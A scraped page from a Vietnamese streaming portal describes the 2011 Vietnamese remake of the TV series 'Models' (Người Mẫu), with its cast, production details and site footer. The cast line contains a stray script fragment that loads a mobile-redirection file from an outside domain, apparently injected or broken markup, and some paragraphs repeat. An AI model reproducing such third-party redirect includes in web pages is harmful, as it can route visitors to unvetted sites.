xem phim nguoi mau phien ban vn online, download Người Mẫu - Phiên Bản VN 22/35 hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Người Mẫu - Phiên Bản VN 22/35 - phim bo dang chieu
nguoi mau  phien ban vn

Người Mẫu - Phiên Bản VN 22/35

,

2 episodes | Luot Xem: 392911   |  2011 |  Vietnam
Dien Vien: Bình Minh, Thanh Hằng, Xuân Lan, Trương Minh Cường, Bảo Trúc, hoa hậu Dương Mỹ Linh src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim

Bộ phim 'Models' (Người mẫu) từng làm mưa làm gió tại VN thời gian trước sẽ lại đến với khán giả Việt qua phiên bản mới do những diễn viên chính là người mẫu đóng vai người mẫu.
90% lượng diễn viên phim 'Người mẫu' phiên bản Việt là người mẫu thật thủ vai. Trong đó có thể kể đến: Bình Minh, Thanh Hằng, Xuân Lan, Trương Minh Cường, Bảo Trúc, hoa hậu Dương Mỹ Linh.
Nhà sản xuất là đại diện công ty Kiết Tường hứa rằng 'Người mẫu' phiên bản Việt sẽ rất Việt Nam vì những người chuyển thể chỉ dựa theo cốt truyện để viết lại toàn bộ chi tiết. Tuy nhiên, nói thì nói thế chứ cũng rất khó lòng thoát hẳn nguyên tác. Và họ đã chuyển thể như thế nào thì phải đợi đến khi xem phim mới rõ.
o diễn 'Cô nàng tóc rối' Nguyễn Minh Chung sẽ là đạo diễn phim này. Xem ra anh khá có duyên với phim 'lai'. Anh khẳng định sẽ cố gắng tránh xa chất Hàn để tránh cho khán giả nhầm lẫn và cho rằng nhà làm phim bắt chước.Vấn đề diễn viên được đặt ra khá căng thẳng với đoàn phim vì nhân vật là người mẫu nên đạo diễn muốn chọn người mẫu thật để đóng.
Điểm mạnh là đạo diễn không cần rèn kỹ năng catwalk cũng như những kỹ năng biểu diễn trong nghề người mẫu cho họ vì bản thân họ đã rất rành rẽ. Nhưng điểm yếu lại cơ bản: không phải người mẫu nào cũng biết diễn. Và điểm yếu này có khi lại làm...hỏng phim.
Vấn đề diễn viên được đặt ra khá căng thẳng với đoàn phim vì nhân vật là người mẫu nên đạo diễn muốn chọn người mẫu thật để đóng.
Điểm mạnh là đạo diễn không cần rèn kỹ năng catwalk cũng như những kỹ năng biểu diễn trong nghề người mẫu cho họ vì bản thân họ đã rất rành rẽ. Nhưng điểm yếu lại cơ bản: không phải người mẫu nào cũng biết diễn. Và điểm yếu này có khi lại làm...hỏng phim.
'Người mẫu' phiên bản Việt sẽ được lồng tiếng chứ không thu tiếng trực tiếp vì sợ không phải người mẫu nào cũng thoại tốt. Phim gồm 35 tập, dự kiến được bấm máy vào ngày 15/1/2011 và sẽ được phát sóng trên kênh VTV3, Đài truyền hình Việt Nam.
Phim cùng thể loại - Similar movies
View: 392912
View: 167741
View: 7022
View: 1275950
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung